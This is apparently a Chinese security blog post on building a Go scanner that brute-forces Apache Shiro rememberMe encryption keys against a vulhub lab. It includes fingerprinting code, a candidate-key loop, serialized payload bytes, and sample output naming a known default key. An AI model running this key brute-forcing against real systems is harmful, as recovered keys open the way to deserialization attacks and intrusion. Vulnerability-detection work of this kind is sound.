apache-shiro可用key检测

发布时间: 2023-03-27 热度: 2097

前言

  • 由于目前的nuclei无法对payload进行复杂的加密操作,虽然nuclei官方正在推进能使用高级脚本编写验证漏洞,但是目前看来离合并还是遥遥无期,所以对于爆破apache-shiro的key这种复杂的请求需要单独开发工具检查。

检测原理

  • 参考**一种另类的 shiro 检测方式,简单来说就是:key正确情况下响应报文中的set-cookie不返回 deleteMe ,key错误情况下响应报文中的set-cookie**返回 deleteMe。
  • 所以逻辑应该是在发送请求头带上下面信息,响应报文中有响应中的set-cookie返回 deleteMe的前提先下做判断的,避免不是apache-shiro的组件也识别到有漏洞存在。
"Cookie":"rememberMe=admin;rememberMe-K=admin"
"Content-Type":"text/xml"
  • 在确保是apache-shiro组件后,再根据各个key加密生成的设置到cookie中rememberMe值上,再次请求,如果响应报文中的set-cookie不返回 deleteMe,说明漏洞存在。

环境搭建

  • 直接使用vulhub中的漏洞环境即可
docker run --rm -p 8080:8080 vulhub/shiro:1.2.4

代码编写

判断是否为apache-shiro组件

  • 虽然前面会先给目标做指纹识别操作,但是可能会存在由关键词识别的误报,所以在验证可用Key之前要先判断是否是apache-shiro,防止目标不是一个apache-shiro组件,就算带上加密后的cookie请求也是没有返回deleteMe,这样就会误报可用的key。
// 检查是POST还是GET
func CheckIsShiroMethod(host string) string { hh := Base.NewHttpClient() header := make(map[string]string, 0) header["Content-Type"] = "text/xml" header["Cookie"] = "rememberMe=admin;rememberMe-K=admin" for _, m := range []string{"POST", "GET"} { resp, err := hh.SendRequest(m, host, nil, header, nil) if err != nil { return "" } if resp != nil { resp.Body.Close() } if strings.Contains(resp.Header.Get("Set-Cookie"), "=deleteMe") { return m } } return ""
}
  • 在真实环境中有遇到POST请求或者GET请求才会返回rememberMe关键字,所以上面的代码在识别目标的同时还返回请求方式,在后面爆破Key的时候就只用这个请求方式。

cookie中rememberMe的生成

  • shiro_simple_principal_collection可以从apache-shiro的开源利用工具中生成再扣下来,这里我使用我写的ysoserial_rs生成的序列化数据。
➜ ~ ./ysoserial_amd64 -p shiro_spc -f hex
aced0005737200326f72672e6170616368652e736869726f2e7375626a6563742e53696d706c655072696e636970616c436f6c6c656374696f6ea87f5825c6a3084a0300014c000f7265616c6d5072696e636970616c7374000f4c6a6176612f7574696c2f4d61703b78707077010078
  • 十六进制转go的byte数组写为常量就可以了。
shiro_spc = []byte{0xac, 0xed, 0x0, 0x5, 0x73, 0x72, 0x0, 0x32, 0x6f, 0x72, 0x67, 0x2e, 0x61, 0x70, 0x61, 0x63, 0x68, 0x65, 0x2e, 0x73, 0x68, 0x69, 0x72, 0x6f, 0x2e, 0x73, 0x75, 0x62, 0x6a, 0x65, 0x63, 0x74, 0x2e, 0x53, 0x69, 0x6d, 0x70, 0x6c, 0x65, 0x50, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x43, 0x6f, 0x6c, 0x6c, 0x65, 0x63, 0x74, 0x69, 0x6f, 0x6e, 0xa8, 0x7f, 0x58, 0x25, 0xc6, 0xa3, 0x8, 0x4a, 0x3, 0x0, 0x1, 0x4c, 0x0, 0xf, 0x72, 0x65, 0x61, 0x6c, 0x6d, 0x50, 0x72, 0x69, 0x6e, 0x63, 0x69, 0x70, 0x61, 0x6c, 0x73, 0x74, 0x0, 0xf, 0x4c, 0x6a, 0x61, 0x76, 0x61, 0x2f, 0x75, 0x74, 0x69, 0x6c, 0x2f, 0x4d, 0x61, 0x70, 0x3b, 0x78, 0x70, 0x70, 0x77, 0x1, 0x0, 0x78}
  • 在加密时提供可选参数AES加密模式,CBC或者GCM。
for _, m := range []string{"CBC", "GCM"} { for i := range payloads { remember_me_coockie := RememberMe(payloads[i], m) header := make(map[string]string, 0) header["Content-Type"] = "text/xml" header["Cookie"] = "rememberMe=" + remember_me_coockie header["User-Agent"] = Base.DefaultUserAgent resp, _ := h.SendRequest(method, host, nil, header, nil) if resp != nil { resp.Body.Close() } if !strings.Contains(resp.Header.Get("Set-Cookie"), "=deleteMe") { meta := map[string]interface{}{"key": payloads[i], "mode": m} Base.MakeNucleiResult(&ResultEvent, resp, meta) return ResultEvent } } }

将go的response转为nuclei的ResultEvent

  • 首先自定义Info的信息,兼容nuclei数据结构。
ResultEvent := output.ResultEvent{ TemplateID: "apache-shiro-key", Type: "http", Timestamp: time.Now(), MatcherStatus: false, Info: model.Info{Name: "ApacheShiro可用Key", SeverityHolder: severity.Holder{Severity: severity.Critical}, Authors: stringslice.StringSlice{Value: []string{"cn-kali-team"}}, Tags: stringslice.StringSlice{Value: []string{"apache-shiro"}}, Reference: stringslice.StringSlice{Value: []string{}}, }, Host: host, }
  • meta信息,也就是爆破出来的key和加密模式添加到Metadata,这样就可以在nuclei的结果中获取结果并且展示。
package Base
import ( "net/http" "net/http/httputil" "github.com/projectdiscovery/nuclei/v2/pkg/output" "moul.io/http2curl"
)
func MakeNucleiResult(ResultEvent *output.ResultEvent, resp *http.Response, meta map[string]interface{}) { command, _ := http2curl.GetCurlCommand(resp.Request) ResultEvent.CURLCommand = command.String() dump_request, _ := httputil.DumpRequest(resp.Request, true) if resp.Request.Response != nil { dump_response, _ := httputil.DumpResponse(resp.Request.Response, true) ResultEvent.Response = string(dump_response) } dump_response, _ := httputil.DumpResponse(resp.Request.Response, true) ResultEvent.Request = string(dump_request) ResultEvent.MatcherStatus = true ResultEvent.Metadata = meta ResultEvent.Matched = resp.Request.URL.String() ResultEvent.Lines = []int{} ResultEvent.IP = resp.Request.URL.Hostname()
}
  • 结果要转为json的话,漏洞等级这里需要用到自定义序列化,所以要使用jsoniter这个库实现**,**最后得到的json为:
{ "template-id": "apache-shiro-key", "info": { "name": "ApacheShiro可用Key", "author": [ "cn-kali-team" ], "tags": [ "apache-shiro" ], "reference": [], "severity": "critical" }, "type": "http", "host": "<http://127.0.0.1:8080>", "matched-at": "<http://127.0.0.1:8080/login;jsessionid=96DB54118C3AD9AE431629A46DB4291F>", "request": "GET /login;jsessionid=96DB54118C3AD9AE431629A46DB4291F HTTP/0.0\\r\\nHost: 127.0.0.1:8080\\r\\nContent-Type: text/xml\\r\\nCookie: rememberMe=ztWoBlfxzv6vbA8ItcE4qpxrz3t8pCmarvebhauhXyxcLurOHoCCkM2TNfljEtxR3BmW3gL+OkwnvJjHCpS8S//FFQ2VcdiXbzKUGrOBHgpADIBDPQzjam34m9G40hOFkC995grt0wmTm5Lj6F5CqEmtA1/gJDL561R9cKhQVznUlwqyXTh/gZFSSTiJ6m/D\\r\\nReferer: <http://127.0.0.1:8080>\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\\r\\n\\r\\n", "response": "HTTP/1.1 302 \\r\\nConnection: close\\r\\nContent-Length: 0\\r\\nDate: Mon, 15 Aug 2022 09:57:11 GMT\\r\\nLocation: <http://127.0.0.1:8080/login;jsessionid=96DB54118C3AD9AE431629A46DB4291F\\r\\nSet-Cookie:> JSESSIONID=96DB54118C3AD9AE431629A46DB4291F; Path=/; HttpOnly\\r\\n\\r\\n", "meta": { "key": "kPH+bIxk5D2deZiIxcaaaA==", "mode": "CBC" }, "ip": "127.0.0.1", "timestamp": "2022-08-15T17:57:11.598443866+08:00", "curl-command": "curl -X 'GET' -H 'Content-Type: text/xml' -H 'Cookie: rememberMe=ztWoBlfxzv6vbA8ItcE4qpxrz3t8pCmarvebhauhXyxcLurOHoCCkM2TNfljEtxR3BmW3gL+OkwnvJjHCpS8S//FFQ2VcdiXbzKUGrOBHgpADIBDPQzjam34m9G40hOFkC995grt0wmTm5Lj6F5CqEmtA1/gJDL561R9cKhQVznUlwqyXTh/gZFSSTiJ6m/D' -H 'Referer: <http://127.0.0.1:8080>' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36' '<http://127.0.0.1:8080/login;jsessionid=96DB54118C3AD9AE431629A46DB4291F>'", "matcher-status": true, "matched-line": []
}

参考

请在下方留下您的评论. 加入TG吹水群